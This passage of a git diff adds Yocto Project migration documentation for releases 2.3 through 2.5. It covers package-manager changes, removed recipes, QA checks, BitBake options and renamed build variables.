+recipes. Moving these recipes into a separate layer both makes the
+different needs of the recipes clearer and clearly identifies the number
+of these recipes.
+
+.. note::
+
+ The long-term solution might be to move to BSD-licensed replacements
+ of the GPLv3 components for those that need to exclude GPLv3-licensed
+ components from the target system. This solution will be investigated
+ for future Yocto Project releases.
+
+.. _migration-2.3-package-management-changes:
+
+Package Management Changes
+--------------------------
+
+The following package management changes took place:
+
+- Smart package manager is replaced by DNF package manager. Smart has
+ become unmaintained upstream, is not ported to Python 3.x.
+ Consequently, Smart needed to be replaced. DNF is the only feasible
+ candidate.
+
+ The change in functionality is that the on-target runtime package
+ management from remote package feeds is now done with a different
+ tool that has a different set of command-line options. If you have
+ scripts that call the tool directly, or use its API, they need to be
+ fixed.
+
+ For more information, see the `DNF
+ Documentation <http://dnf.readthedocs.io/en/latest/>`__.
+
+- Rpm 5.x is replaced with Rpm 4.x. This is done for two major reasons:
+
+ - DNF is API-incompatible with Rpm 5.x and porting it and
+ maintaining the port is non-trivial.
+
+ - Rpm 5.x itself has limited maintenance upstream, and the Yocto
+ Project is one of the very few remaining users.
+
+- Berkeley DB 6.x is removed and Berkeley DB 5.x becomes the default:
+
+ - Version 6.x of Berkeley DB has largely been rejected by the open
+ source community due to its AGPLv3 license. As a result, most
+ mainstream open source projects that require DB are still
+ developed and tested with DB 5.x.
+
+ - In OE-core, the only thing that was requiring DB 6.x was Rpm 5.x.
+ Thus, no reason exists to continue carrying DB 6.x in OE-core.
+
+- ``createrepo`` is replaced with ``createrepo_c``.
+
+ ``createrepo_c`` is the current incarnation of the tool that
+ generates remote repository metadata. It is written in C as compared
+ to ``createrepo``, which is written in Python. ``createrepo_c`` is
+ faster and is maintained.
+
+- Architecture-independent RPM packages are "noarch" instead of "all".
+
+ This change was made because too many places in DNF/RPM4 stack
+ already make that assumption. Only the filenames and the architecture
+ tag has changed. Nothing else has changed in OE-core system,
+ particularly in the :ref:`allarch.bbclass <ref-classes-allarch>`
+ class.
+
+- Signing of remote package feeds using ``PACKAGE_FEED_SIGN`` is not
+ currently supported. This issue will be fully addressed in a future
+ Yocto Project release. See :yocto_bugs:`defect 11209 </show_bug.cgi?id=11209>`
+ for more information on a solution to package feed signing with RPM
+ in the Yocto Project 2.3 release.
+
+- OPKG now uses the libsolv backend for resolving package dependencies
+ by default. This is vastly superior to OPKG's internal ad-hoc solver
+ that was previously used. This change does have a small impact on
+ disk (around 500 KB) and memory footprint.
+
+ .. note::
+
+ For further details on this change, see the
+ :yocto_git:`commit message </cgit/cgit.cgi/poky/commit/?id=f4d4f99cfbc2396e49c1613a7d237b9e57f06f81>`.
+
+.. _migration-2.3-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been removed:
+
+- ``linux-yocto 4.8``: Version 4.8 has been removed. Versions 4.1
+ (LTSI), 4.4 (LTS), 4.9 (LTS/LTSI) and 4.10 are now present.
+
+- ``python-smartpm``: Functionally replaced by ``dnf``.
+
+- ``createrepo``: Replaced by the ``createrepo-c`` recipe.
+
+- ``rpmresolve``: No longer needed with the move to RPM 4 as RPM
+ itself is used instead.
+
+- ``gstreamer``: Removed the GStreamer Git version recipes as they
+ have been stale. ``1.10.``\ x recipes are still present.
+
+- ``alsa-conf-base``: Merged into ``alsa-conf`` since ``libasound``
+ depended on both. Essentially, no way existed to install only one of
+ these.
+
+- ``tremor``: Moved to ``meta-multimedia``. Fixed-integer Vorbis
+ decoding is not needed by current hardware. Thus, GStreamer's ivorbis
+ plugin has been disabled by default eliminating the need for the
+ ``tremor`` recipe in :term:`OpenEmbedded-Core (OE-Core)`.
+
+- ``gummiboot``: Replaced by ``systemd-boot``.
+
+.. _migration-2.3-wic-changes:
+
+Wic Changes
+-----------
+
+The following changes have been made to Wic:
+
+.. note::
+
+ For more information on Wic, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:creating partitioned images using wic`"
+ section in the Yocto Project Development Tasks Manual.
+
+- *Default Output Directory Changed:* Wic's default output directory is
+ now the current directory by default instead of the unusual
+ ``/var/tmp/wic``.
+
+ The "-o" and "--outdir" options remain unchanged and are used to
+ specify your preferred output directory if you do not want to use the
+ default directory.
+
+- *fsimage Plug-in Removed:* The Wic fsimage plugin has been removed as
+ it duplicates functionality of the rawcopy plugin.
+
+.. _migration-2.3-qa-changes:
+
+QA Changes
+----------
+
+The following QA checks have changed:
+
+- ``unsafe-references-in-binaries``: The
+ ``unsafe-references-in-binaries`` QA check, which was disabled by
+ default, has now been removed. This check was intended to detect
+ binaries in ``/bin`` that link to libraries in ``/usr/lib`` and have
+ the case where the user has ``/usr`` on a separate filesystem to
+ ``/``.
+
+ The removed QA check was buggy. Additionally, ``/usr`` residing on a
+ separate partition from ``/`` is now a rare configuration.
+ Consequently, ``unsafe-references-in-binaries`` was removed.
+
+- ``file-rdeps``: The ``file-rdeps`` QA check is now an error by
+ default instead of a warning. Because it is an error instead of a
+ warning, you need to address missing runtime dependencies.
+
+ For additional information, see the
+ :ref:`insane <ref-classes-insane>` class and the
+ ":ref:`ref-manual/ref-qa-checks:errors and warnings`" section.
+
+.. _migration-2.3-miscellaneous-changes:
+
+Miscellaneous Changes
+---------------------
+
+The following miscellaneous changes have occurred:
+
+- In this release, a number of recipes have been changed to ignore the
+ ``largefile`` :term:`DISTRO_FEATURES` item,
+ enabling large file support unconditionally. This feature has always
+ been enabled by default. Disabling the feature has not been widely
+ tested.
+
+ .. note::
+
+ Future releases of the Yocto Project will remove entirely the
+ ability to disable the
+ largefile
+ feature, which would make it unconditionally enabled everywhere.
+
+- If the :term:`DISTRO_VERSION` value contains
+ the value of the :term:`DATE` variable, which is the
+ default between Poky releases, the ``DATE`` value is explicitly
+ excluded from ``/etc/issue`` and ``/etc/issue.net``, which is
+ displayed at the login prompt, in order to avoid conflicts with
+ Multilib enabled. Regardless, the ``DATE`` value is inaccurate if the
+ ``base-files`` recipe is restored from shared state (sstate) rather
+ than rebuilt.
+
+ If you need the build date recorded in ``/etc/issue*`` or anywhere
+ else in your image, a better method is to define a post-processing
+ function to do it and have the function called from
+ :term:`ROOTFS_POSTPROCESS_COMMAND`.
+ Doing so ensures the value is always up-to-date with the created
+ image.
+
+- Dropbear's ``init`` script now disables DSA host keys by default.
+ This change is in line with the systemd service file, which supports
+ RSA keys only, and with recent versions of OpenSSH, which deprecates
+ DSA host keys.
+
+- The :ref:`buildhistory <ref-classes-buildhistory>` class now
+ correctly uses tabs as separators between all columns in
+ ``installed-package-sizes.txt`` in order to aid import into other
+ tools.
+
+- The ``USE_LDCONFIG`` variable has been replaced with the "ldconfig"
+ ``DISTRO_FEATURES`` feature. Distributions that previously set:
+ ::
+
+ USE_LDCONFIG = "0"
+
+ should now instead use the following:
+
+ ::
+
+ DISTRO_FEATURES_BACKFILL_CONSIDERED_append = " ldconfig"
+
+- The default value of
+ :term:`COPYLEFT_LICENSE_INCLUDE` now
+ includes all versions of AGPL licenses in addition to GPL and LGPL.
+
+ .. note::
+
+ The default list is not intended to be guaranteed as a complete
+ safe list. You should seek legal advice based on what you are
+ distributing if you are unsure.
+
+- Kernel module packages are now suffixed with the kernel version in
+ order to allow module packages from multiple kernel versions to
+ co-exist on a target system. If you wish to return to the previous
+ naming scheme that does not include the version suffix, use the
+ following:
+ ::
+
+ KERNEL_MODULE_PACKAGE_SUFFIX = ""
+
+- Removal of ``libtool`` ``*.la`` files is now enabled by default. The
+ ``*.la`` files are not actually needed on Linux and relocating them
+ is an unnecessary burden.
+
+ If you need to preserve these ``.la`` files (e.g. in a custom
+ distribution), you must change
+ :term:`INHERIT_DISTRO` such that
+ "remove-libtool" is not included in the value.
+
+- Extensible SDKs built for GCC 5+ now refuse to install on a
+ distribution where the host GCC version is 4.8 or 4.9. This change
+ resulted from the fact that the installation is known to fail due to
+ the way the ``uninative`` shared state (sstate) package is built. See
+ the :ref:`uninative <ref-classes-uninative>` class for additional
+ information.
+
+- All native and nativesdk recipes now use a separate
+ ``DISTRO_FEATURES`` value instead of sharing the value used by
+ recipes for the target, in order to avoid unnecessary rebuilds.
+
+ The ``DISTRO_FEATURES`` for ``native`` recipes is
+ :term:`DISTRO_FEATURES_NATIVE` added to
+ an intersection of ``DISTRO_FEATURES`` and
+ :term:`DISTRO_FEATURES_FILTER_NATIVE`.
+
+ For nativesdk recipes, the corresponding variables are
+ :term:`DISTRO_FEATURES_NATIVESDK`
+ and
+ :term:`DISTRO_FEATURES_FILTER_NATIVESDK`.
+
+- The ``FILESDIR`` variable, which was previously deprecated and rarely
+ used, has now been removed. You should change any recipes that set
+ ``FILESDIR`` to set :term:`FILESPATH` instead.
+
+- The ``MULTIMACH_HOST_SYS`` variable has been removed as it is no
+ longer needed with recipe-specific sysroots.
+
+
diff --git a/documentation/ref-manual/migration-2.4.rst b/documentation/ref-manual/migration-2.4.rst
new file mode 100644
index 0000000000..260b3204b6
--- /dev/null
+++ b/documentation/ref-manual/migration-2.4.rst
@@ -0,0 +1,327 @@
+Moving to the Yocto Project 2.4 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 2.4 Release from the prior release.
+
+.. _migration-2.4-memory-resident-mode:
+
+Memory Resident Mode
+--------------------
+
+A persistent mode is now available in BitBake's default operation,
+replacing its previous "memory resident mode" (i.e.
+``oe-init-build-env-memres``). Now you only need to set
+:term:`BB_SERVER_TIMEOUT` to a timeout (in
+seconds) and BitBake's server stays resident for that amount of time
+between invocations. The ``oe-init-build-env-memres`` script has been
+removed since a separate environment setup script is no longer needed.
+
+.. _migration-2.4-packaging-changes:
+
+Packaging Changes
+-----------------
+
+This section provides information about packaging changes that have
+occurred:
+
+- ``python3`` Changes:
+
+ - The main "python3" package now brings in all of the standard
+ Python 3 distribution rather than a subset. This behavior matches
+ what is expected based on traditional Linux distributions. If you
+ wish to install a subset of Python 3, specify ``python-core`` plus
+ one or more of the individual packages that are still produced.
+
+ - ``python3``: The ``bz2.py``, ``lzma.py``, and
+ ``_compression.py`` scripts have been moved from the
+ ``python3-misc`` package to the ``python3-compression`` package.
+
+- ``binutils``: The ``libbfd`` library is now packaged in a separate
+ "libbfd" package. This packaging saves space when certain tools (e.g.
+ ``perf``) are installed. In such cases, the tools only need
+ ``libbfd`` rather than all the packages in ``binutils``.
+
+- ``util-linux`` Changes:
+
+ - The ``su`` program is now packaged in a separate "util-linux-su"
+ package, which is only built when "pam" is listed in the
+ :term:`DISTRO_FEATURES` variable.
+ ``util-linux`` should not be installed unless it is needed because
+ ``su`` is normally provided through the shadow file format. The
+ main ``util-linux`` package has runtime dependencies (i.e.
+ :term:`RDEPENDS`) on the ``util-linux-su`` package
+ when "pam" is in ``DISTRO_FEATURES``.
+
+ - The ``switch_root`` program is now packaged in a separate
+ "util-linux-switch-root" package for small initramfs images that
+ do not need the whole ``util-linux`` package or the busybox
+ binary, which are both much larger than ``switch_root``. The main
+ ``util-linux`` package has a recommended runtime dependency (i.e.
+ :term:`RRECOMMENDS`) on the
+ ``util-linux-switch-root`` package.
+
+ - The ``ionice`` program is now packaged in a separate
+ "util-linux-ionice" package. The main ``util-linux`` package has a
+ recommended runtime dependency (i.e. ``RRECOMMENDS``) on the
+ ``util-linux-ionice`` package.
+
+- ``initscripts``: The ``sushell`` program is now packaged in a
+ separate "initscripts-sushell" package. This packaging change allows
+ systems to pull ``sushell`` in when ``selinux`` is enabled. The
+ change also eliminates needing to pull in the entire ``initscripts``
+ package. The main ``initscripts`` package has a runtime dependency
+ (i.e. ``RDEPENDS``) on the ``sushell`` package when "selinux" is in
+ ``DISTRO_FEATURES``.
+
+- ``glib-2.0``: The ``glib-2.0`` package now has a recommended
+ runtime dependency (i.e. ``RRECOMMENDS``) on the ``shared-mime-info``
+ package, since large portions of GIO are not useful without the MIME
+ database. You can remove the dependency by using the
+ :term:`BAD_RECOMMENDATIONS` variable if
+ ``shared-mime-info`` is too large and is not required.
+
+- *Go Standard Runtime:* The Go standard runtime has been split out
+ from the main ``go`` recipe into a separate ``go-runtime`` recipe.
+
+.. _migration-2.4-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been removed:
+
+- ``acpitests``: This recipe is not maintained.
+
+- ``autogen-native``: No longer required by Grub, oe-core, or
+ meta-oe.
+
+- ``bdwgc``: Nothing in OpenEmbedded-Core requires this recipe. It
+ has moved to meta-oe.
+
+- ``byacc``: This recipe was only needed by rpm 5.x and has moved to
+ meta-oe.
+
+- ``gcc (5.4)``: The 5.4 series dropped the recipe in favor of 6.3 /
+ 7.2.
+
+- ``gnome-common``: Deprecated upstream and no longer needed.
+
+- ``go-bootstrap-native``: Go 1.9 does its own bootstrapping so this
+ recipe has been removed.
+
+- ``guile``: This recipe was only needed by ``autogen-native`` and
+ ``remake``. The recipe is no longer needed by either of these
+ programs.
+
+- ``libclass-isa-perl``: This recipe was previously needed for LSB 4,
+ no longer needed.
+
+- ``libdumpvalue-perl``: This recipe was previously needed for LSB 4,
+ no longer needed.
+
+- ``libenv-perl``: This recipe was previously needed for LSB 4, no
+ longer needed.
+
+- ``libfile-checktree-perl``: This recipe was previously needed for
+ LSB 4, no longer needed.
+
+- ``libi18n-collate-perl``: This recipe was previously needed for LSB
+ 4, no longer needed.
+
+- ``libiconv``: This recipe was only needed for ``uclibc``, which was
+ removed in the previous release. ``glibc`` and ``musl`` have their
+ own implementations. ``meta-mingw`` still needs ``libiconv``, so it
+ has been moved to ``meta-mingw``.
+
+- ``libpng12``: This recipe was previously needed for LSB. The
+ current ``libpng`` is 1.6.x.
+
+- ``libpod-plainer-perl``: This recipe was previously needed for LSB
+ 4, no longer needed.
+
+- ``linux-yocto (4.1)``: This recipe was removed in favor of 4.4,
+ 4.9, 4.10 and 4.12.
+
+- ``mailx``: This recipe was previously only needed for LSB
+ compatibility, and upstream is defunct.
+
+- ``mesa (git version only)``: The git version recipe was stale with
+ respect to the release version.
+
+- ``ofono (git version only)``: The git version recipe was stale with
+ respect to the release version.
+
+- ``portmap``: This recipe is obsolete and is superseded by
+ ``rpcbind``.
+
+- ``python3-pygpgme``: This recipe is old and unmaintained. It was
+ previously required by ``dnf``, which has switched to official
+ ``gpgme`` Python bindings.
+
+- ``python-async``: This recipe has been removed in favor of the
+ Python 3 version.
+
+- ``python-gitdb``: This recipe has been removed in favor of the
+ Python 3 version.
+
+- ``python-git``: This recipe was removed in favor of the Python 3
+ version.
+
+- ``python-mako``: This recipe was removed in favor of the Python 3
+ version.
+
+- ``python-pexpect``: This recipe was removed in favor of the Python
+ 3 version.
+
+- ``python-ptyprocess``: This recipe was removed in favor of Python
+ the 3 version.
+
+- ``python-pycurl``: Nothing is using this recipe in
+ OpenEmbedded-Core (i.e. ``meta-oe``).
+
+- ``python-six``: This recipe was removed in favor of the Python 3
+ version.
+
+- ``python-smmap``: This recipe was removed in favor of the Python 3
+ version.
+
+- ``remake``: Using ``remake`` as the provider of ``virtual/make`` is
+ broken. Consequently, this recipe is not needed in OpenEmbedded-Core.
+
+.. _migration-2.4-kernel-device-tree-move:
+
+Kernel Device Tree Move
+-----------------------
+
+Kernel Device Tree support is now easier to enable in a kernel recipe.
+The Device Tree code has moved to a
+:ref:`kernel-devicetree <ref-classes-kernel-devicetree>` class.
+Functionality is automatically enabled for any recipe that inherits the
+:ref:`kernel <ref-classes-kernel>` class and sets the
+:term:`KERNEL_DEVICETREE` variable. The
+previous mechanism for doing this,
+``meta/recipes-kernel/linux/linux-dtb.inc``, is still available to avoid
+breakage, but triggers a deprecation warning. Future releases of the
+Yocto Project will remove ``meta/recipes-kernel/linux/linux-dtb.inc``.
+It is advisable to remove any ``require`` statements that request
+``meta/recipes-kernel/linux/linux-dtb.inc`` from any custom kernel
+recipes you might have. This will avoid breakage in post 2.4 releases.
+
+.. _migration-2.4-package-qa-changes:
+
+Package QA Changes
+------------------
+
+The following package QA changes took place:
+
+- The "unsafe-references-in-scripts" QA check has been removed.
+
+- If you refer to ``${COREBASE}/LICENSE`` within
+ :term:`LIC_FILES_CHKSUM` you receive a
+ warning because this file is a description of the license for
+ OE-Core. Use ``${COMMON_LICENSE_DIR}/MIT`` if your recipe is
+ MIT-licensed and you cannot use the preferred method of referring to
+ a file within the source tree.
+
+.. _migration-2.4-readme-changes:
+
+``README`` File Changes
+-----------------------
+
+The following are changes to ``README`` files:
+
+- The main Poky ``README`` file has been moved to the ``meta-poky``
+ layer and has been renamed ``README.poky``. A symlink has been
+ created so that references to the old location work.
+
+- The ``README.hardware`` file has been moved to ``meta-yocto-bsp``. A
+ symlink has been created so that references to the old location work.
+
+- A ``README.qemu`` file has been created with coverage of the
+ ``qemu*`` machines.
+
+.. _migration-2.4-miscellaneous-changes:
+
+Miscellaneous Changes
+---------------------
+
+The following are additional changes:
+
+- The ``ROOTFS_PKGMANAGE_BOOTSTRAP`` variable and any references to it
+ have been removed. You should remove this variable from any custom
+ recipes.
+
+- The ``meta-yocto`` directory has been removed.
+
+ .. note::
+
+ In the Yocto Project 2.1 release
+ meta-yocto
+ was renamed to
+ meta-poky
+ and the
+ meta-yocto
+ subdirectory remained to avoid breaking existing configurations.
+
+- The ``maintainers.inc`` file, which tracks maintainers by listing a
+ primary person responsible for each recipe in OE-Core, has been moved
+ from ``meta-poky`` to OE-Core (i.e. from
+ ``meta-poky/conf/distro/include`` to ``meta/conf/distro/include``).
+
+- The :ref:`buildhistory <ref-classes-buildhistory>` class now makes
+ a single commit per build rather than one commit per subdirectory in
+ the repository. This behavior assumes the commits are enabled with
+ :term:`BUILDHISTORY_COMMIT` = "1", which
+ is typical. Previously, the ``buildhistory`` class made one commit
+ per subdirectory in the repository in order to make it easier to see
+ the changes for a particular subdirectory. To view a particular
+ change, specify that subdirectory as the last parameter on the
+ ``git show`` or ``git diff`` commands.
+
+- The ``x86-base.inc`` file, which is included by all x86-based machine
+ configurations, now sets :term:`IMAGE_FSTYPES`
+ using ``?=`` to "live" rather than appending with ``+=``. This change
+ makes the default easier to override.
+
+- BitBake fires multiple "BuildStarted" events when multiconfig is
+ enabled (one per configuration). For more information, see the
+ ":ref:`Events <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:events>`" section in the BitBake User
+ Manual.
+
+- By default, the ``security_flags.inc`` file sets a
+ :term:`GCCPIE` variable with an option to enable
+ Position Independent Executables (PIE) within ``gcc``. Enabling PIE
+ in the GNU C Compiler (GCC), makes Return Oriented Programming (ROP)
+ attacks much more difficult to execute.
+
+- OE-Core now provides a ``bitbake-layers`` plugin that implements a
+ "create-layer" subcommand. The implementation of this subcommand has
+ resulted in the ``yocto-layer`` script being deprecated and will
+ likely be removed in the next Yocto Project release.
+
+- The ``vmdk``, ``vdi``, and ``qcow2`` image file types are now used in
+ conjunction with the "wic" image type through ``CONVERSION_CMD``.
+ Consequently, the equivalent image types are now ``wic.vmdk``,
+ ``wic.vdi``, and ``wic.qcow2``, respectively.
+
+- ``do_image_<type>[depends]`` has replaced ``IMAGE_DEPENDS_<type>``.
+ If you have your own classes that implement custom image types, then
+ you need to update them.
+
+- OpenSSL 1.1 has been introduced. However, the default is still 1.0.x
+ through the :term:`PREFERRED_VERSION`
+ variable. This preference is set is due to the remaining
+ compatibility issues with other software. The
+ :term:`PROVIDES` variable in the openssl 1.0 recipe
+ now includes "openssl10" as a marker that can be used in
+ :term:`DEPENDS` within recipes that build software
+ that still depend on OpenSSL 1.0.
+
+- To ensure consistent behavior, BitBake's "-r" and "-R" options (i.e.
+ prefile and postfile), which are used to read or post-read additional
+ configuration files from the command line, now only affect the
+ current BitBake command. Before these BitBake changes, these options
+ would "stick" for future executions.
+
+
diff --git a/documentation/ref-manual/migration-2.5.rst b/documentation/ref-manual/migration-2.5.rst
new file mode 100644
index 0000000000..1aeddc81c3
--- /dev/null
+++ b/documentation/ref-manual/migration-2.5.rst
@@ -0,0 +1,310 @@
+Moving to the Yocto Project 2.5 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 2.5 Release from the prior release.
+
+.. _migration-2.5-packaging-changes:
+
+Packaging Changes
+-----------------
+
+This section provides information about packaging changes that have
+occurred:
+
+- ``bind-libs``: The libraries packaged by the bind recipe are in a
+ separate ``bind-libs`` package.
+
+- ``libfm-gtk``: The ``libfm`` GTK+ bindings are split into a
+ separate ``libfm-gtk`` package.
+
+- ``flex-libfl``: The flex recipe splits out libfl into a separate
+ ``flex-libfl`` package to avoid too many dependencies being pulled in
+ where only the library is needed.
+
+- ``grub-efi``: The ``grub-efi`` configuration is split into a
+ separate ``grub-bootconf`` recipe. However, the dependency
+ relationship from ``grub-efi`` is through a virtual/grub-bootconf
+ provider making it possible to have your own recipe provide the
+ dependency. Alternatively, you can use a BitBake append file to bring
+ the configuration back into the ``grub-efi`` recipe.
+
+- *armv7a Legacy Package Feed Support:* Legacy support is removed for
+ transitioning from ``armv7a`` to ``armv7a-vfp-neon`` in package
+ feeds, which was previously enabled by setting
+ ``PKGARCHCOMPAT_ARMV7A``. This transition occurred in 2011 and active
+ package feeds should by now be updated to the new naming.
+
+.. _migration-2.5-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been removed:
+
+- ``gcc``: The version 6.4 recipes are replaced by 7.x.
+
+- ``gst-player``: Renamed to ``gst-examples`` as per upstream.
+
+- ``hostap-utils``: This software package is obsolete.
+
+- ``latencytop``: This recipe is no longer maintained upstream. The
+ last release was in 2009.
+
+- ``libpfm4``: The only file that requires this recipe is
+ ``oprofile``, which has been removed.
+
+- ``linux-yocto``: The version 4.4, 4.9, and 4.10 recipes have been
+ removed. Versions 4.12, 4.14, and 4.15 remain.
+
+- ``man``: This recipe has been replaced by modern ``man-db``
+
+- ``mkelfimage``: This tool has been removed in the upstream coreboot
+ project, and is no longer needed with the removal of the ELF image
+ type.
+
+- ``nativesdk-postinst-intercept``: This recipe is not maintained.
+
+- ``neon``: This software package is no longer maintained upstream
+ and is no longer needed by anything in OpenEmbedded-Core.
+
+- ``oprofile``: The functionality of this recipe is replaced by
+ ``perf`` and keeping compatibility on an ongoing basis with ``musl``
+ is difficult.
+
+- ``pax``: This software package is obsolete.
+
+- ``stat``: This software package is not maintained upstream.
+ ``coreutils`` provides a modern stat binary.
+
+- ``zisofs-tools-native``: This recipe is no longer needed because
+ the compressed ISO image feature has been removed.
+
+.. _migration-2.5-scripts-and-tools-changes:
+
+Scripts and Tools Changes
+-------------------------
+
+The following are changes to scripts and tools:
+
+- ``yocto-bsp``, ``yocto-kernel``, and ``yocto-layer``: The
+ ``yocto-bsp``, ``yocto-kernel``, and ``yocto-layer`` scripts
+ previously shipped with poky but not in OpenEmbedded-Core have been
+ removed. These scripts are not maintained and are outdated. In many
+ cases, they are also limited in scope. The
+ ``bitbake-layers create-layer`` command is a direct replacement for
+ ``yocto-layer``. See the documentation to create a BSP or kernel
+ recipe in the ":ref:`bsp-guide/bsp:bsp kernel recipe example`" section.
+
+- ``devtool finish``: ``devtool finish`` now exits with an error if
+ there are uncommitted changes or a rebase/am in progress in the
+ recipe's source repository. If this error occurs, there might be
+ uncommitted changes that will not be included in updates to the
+ patches applied by the recipe. A -f/--force option is provided for
+ situations that the uncommitted changes are inconsequential and you
+ want to proceed regardless.
+
+- ``scripts/oe-setup-rpmrepo`` script: The functionality of
+ ``scripts/oe-setup-rpmrepo`` is replaced by
+ ``bitbake package-index``.
+
+- ``scripts/test-dependencies.sh`` script: The script is largely made
+ obsolete by the recipe-specific sysroots functionality introduced in
+ the previous release.
+
+.. _migration-2.5-bitbake-changes:
+
+BitBake Changes
+---------------
+
+The following are BitBake changes:
+
+- The ``--runall`` option has changed. There are two different
+ behaviors people might want:
+
+ - *Behavior A:* For a given target (or set of targets) look through
+ the task graph and run task X only if it is present and will be
+ built.
+
+ - *Behavior B:* For a given target (or set of targets) look through
+ the task graph and run task X if any recipe in the taskgraph has
+ such a target, even if it is not in the original task graph.
+
+ The ``--runall`` option now performs "Behavior B". Previously
+ ``--runall`` behaved like "Behavior A". A ``--runonly`` option has
+ been added to retain the ability to perform "Behavior A".
+
+- Several explicit "run this task for all recipes in the dependency
+ tree" tasks have been removed (e.g. ``fetchall``, ``checkuriall``,
+ and the ``*all`` tasks provided by the ``distrodata`` and
+ ``archiver`` classes). There is a BitBake option to complete this for
+ any arbitrary task. For example:
+ ::
+
+ bitbake <target> -c fetchall
+
+ should now be replaced with:
+ ::
+
+ bitbake <target> --runall=fetch
+
+.. _migration-2.5-python-and-python3-changes:
+
+Python and Python 3 Changes
+---------------------------
+
+The following are auto-packaging changes to Python and Python 3:
+
+The script-managed ``python-*-manifest.inc`` files that were previously
+used to generate Python and Python 3 packages have been replaced with a
+JSON-based file that is easier to read and maintain. A new task is
+available for maintainers of the Python recipes to update the JSON file
+when upgrading to new Python versions. You can now edit the file
+directly instead of having to edit a script and run it to update the
+file.
+
+One particular change to note is that the Python recipes no longer have
+build-time provides for their packages. This assumes ``python-foo`` is
+one of the packages provided by the Python recipe. You can no longer run
+``bitbake python-foo`` or have a
+:term:`DEPENDS` on ``python-foo``,
+but doing either of the following causes the package to work as
+expected: ::
+
+ IMAGE_INSTALL_append = " python-foo"
+
+or ::
+
+ RDEPENDS_${PN} = "python-foo"
+
+The earlier build-time provides behavior was a quirk of the
+way the Python manifest file was created. For more information on this
+change please see :yocto_git:`this commit
+</cgit/cgit.cgi/poky/commit/?id=8d94b9db221d1def42f091b991903faa2d1651ce>`.
+
+.. _migration-2.5-miscellaneous-changes:
+
+Miscellaneous Changes
+---------------------
+
+The following are additional changes:
+
+- The ``kernel`` class supports building packages for multiple kernels.
+ If your kernel recipe or ``.bbappend`` file mentions packaging at
+ all, you should replace references to the kernel in package names
+ with ``${KERNEL_PACKAGE_NAME}``. For example, if you disable
+ automatic installation of the kernel image using
+ ``RDEPENDS_kernel-base = ""`` you can avoid warnings using
+ ``RDEPENDS_${KERNEL_PACKAGE_NAME}-base = ""`` instead.
+
+- The ``buildhistory`` class commits changes to the repository by
+ default so you no longer need to set ``BUILDHISTORY_COMMIT = "1"``.
+ If you want to disable commits you need to set
+ ``BUILDHISTORY_COMMIT = "0"`` in your configuration.
+
+- The ``beaglebone`` reference machine has been renamed to
+ ``beaglebone-yocto``. The ``beaglebone-yocto`` BSP is a reference
+ implementation using only mainline components available in
+ OpenEmbedded-Core and ``meta-yocto-bsp``, whereas Texas Instruments
+ maintains a full-featured BSP in the ``meta-ti`` layer. This rename
+ avoids the previous name clash that existed between the two BSPs.
+
+- The ``update-alternatives`` class no longer works with SysV ``init``
+ scripts because this usage has been problematic. Also, the
+ ``sysklogd`` recipe no longer uses ``update-alternatives`` because it
+ is incompatible with other implementations.
+
+- By default, the :ref:`cmake <ref-classes-cmake>` class uses
+ ``ninja`` instead of ``make`` for building. This improves build
+ performance. If a recipe is broken with ``ninja``, then the recipe
+ can set ``OECMAKE_GENERATOR = "Unix Makefiles"`` to change back to
+ ``make``.
+
+- The previously deprecated ``base_*`` functions have been removed in
+ favor of their replacements in ``meta/lib/oe`` and
+ ``bitbake/lib/bb``. These are typically used from recipes and
+ classes. Any references to the old functions must be updated. The
+ following table shows the removed functions and their replacements:
+
+ +------------------------------+----------------------------------------------------------+
+ | *Removed* | *Replacement* |
+ +==============================+==========================================================+
+ | base_path_join() | oe.path.join() |
+ +------------------------------+----------------------------------------------------------+
+ | base_path_relative() | oe.path.relative() |
+ +------------------------------+----------------------------------------------------------+
+ | base_path_out() | oe.path.format_display() |
+ +------------------------------+----------------------------------------------------------+
+ | base_read_file() | oe.utils.read_file() |
+ +------------------------------+----------------------------------------------------------+
+ | base_ifelse() | oe.utils.ifelse() |
+ +------------------------------+----------------------------------------------------------+
+ | base_conditional() | oe.utils.conditional() |
+ +------------------------------+----------------------------------------------------------+
+ | base_less_or_equal() | oe.utils.less_or_equal() |
+ +------------------------------+----------------------------------------------------------+
+ | base_version_less_or_equal() | oe.utils.version_less_or_equal() |
+ +------------------------------+----------------------------------------------------------+
+ | base_contains() | bb.utils.contains() |
+ +------------------------------+----------------------------------------------------------+
+ | base_both_contain() | oe.utils.both_contain() |
+ +------------------------------+----------------------------------------------------------+
+ | base_prune_suffix() | oe.utils.prune_suffix() |
+ +------------------------------+----------------------------------------------------------+
+ | oe_filter() | oe.utils.str_filter() |
+ +------------------------------+----------------------------------------------------------+
+ | oe_filter_out() | oe.utils.str_filter_out() (or use the \_remove operator) |
+ +------------------------------+----------------------------------------------------------+
+
+- Using ``exit 1`` to explicitly defer a postinstall script until first
+ boot is now deprecated since it is not an obvious mechanism and can
+ mask actual errors. If you want to explicitly defer a postinstall to
+ first boot on the target rather than at ``rootfs`` creation time, use
+ ``pkg_postinst_ontarget()`` or call
+ ``postinst_intercept delay_to_first_boot`` from ``pkg_postinst()``.
+ Any failure of a ``pkg_postinst()`` script (including ``exit 1``)
+ will trigger a warning during ``do_rootfs``.
+
+ For more information, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:post-installation scripts`"
+ section in the Yocto Project Development Tasks Manual.
+
+- The ``elf`` image type has been removed. This image type was removed
+ because the ``mkelfimage`` tool that was required to create it is no
+ longer provided by coreboot upstream and required updating every time
+ ``binutils`` updated.
+
+- Support for .iso image compression (previously enabled through
+ ``COMPRESSISO = "1"``) has been removed. The userspace tools
+ (``zisofs-tools``) are unmaintained and ``squashfs`` provides better
+ performance and compression. In order to build a live image with
+ squashfs+lz4 compression enabled you should now set
+ ``LIVE_ROOTFS_TYPE = "squashfs-lz4"`` and ensure that ``live`` is in
+ ``IMAGE_FSTYPES``.
+
+- Recipes with an unconditional dependency on ``libpam`` are only
+ buildable with ``pam`` in ``DISTRO_FEATURES``. If the dependency is
+ truly optional then it is recommended that the dependency be
+ conditional upon ``pam`` being in ``DISTRO_FEATURES``.
+
+- For EFI-based machines, the bootloader (``grub-efi`` by default) is
+ installed into the image at /boot. Wic can be used to split the
